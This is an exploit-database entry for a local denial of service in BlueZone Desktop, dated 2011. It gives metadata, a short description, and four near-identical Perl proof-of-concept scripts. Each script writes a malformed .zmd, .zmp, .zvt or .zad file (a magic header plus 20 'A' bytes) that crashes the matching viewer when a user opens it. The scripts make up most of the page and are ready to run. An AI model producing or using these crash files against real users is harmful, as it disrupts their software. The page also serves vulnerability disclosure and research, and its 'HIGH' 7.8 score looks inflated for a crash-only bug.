BlueZone Desktop Malformed .zmd file Local Denial of Service

vendor:

BlueZone Desktop

by:

Silent Dream

7.8

CVSS

HIGH

Denial of Service

CWE

Product Name: BlueZone Desktop

Affected Version From: Latest

Affected Version To: Latest

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

BlueZone Desktop Malformed .zmd file Local Denial of Service

A vulnerability in BlueZone Desktop allows a local attacker to cause a denial of service by creating a specially crafted .zmd file. The vulnerability is due to an error when handling a specially crafted .zmd file. An attacker can exploit this vulnerability by creating a specially crafted .zmd file and convincing a user to open it with bzmd.exe. Successful exploitation will cause the application to crash.

Mitigation:

No known mitigation or remediation is available.

Source

Exploit-DB raw data:

# Exploit Title: BlueZone Desktop Malformed .zmd file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
 #To trigger: Run this script, double click file to open with bzmd.exe, program dies.
 
my $file = "bluez.zmd";
my $head = "BZMD215AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zmp file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzmp.exe, program dies.
 
my $file = "bluez.zmp";
my $head = "BZMP215AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zvt file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzvt.exe, program dies.
 
my $file = "bluez.zvt";
my $head = "BZVT100AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zad file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzad.exe, program dies.
 
my $file = "bluez.zad";
my $head = "BZAD200BK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);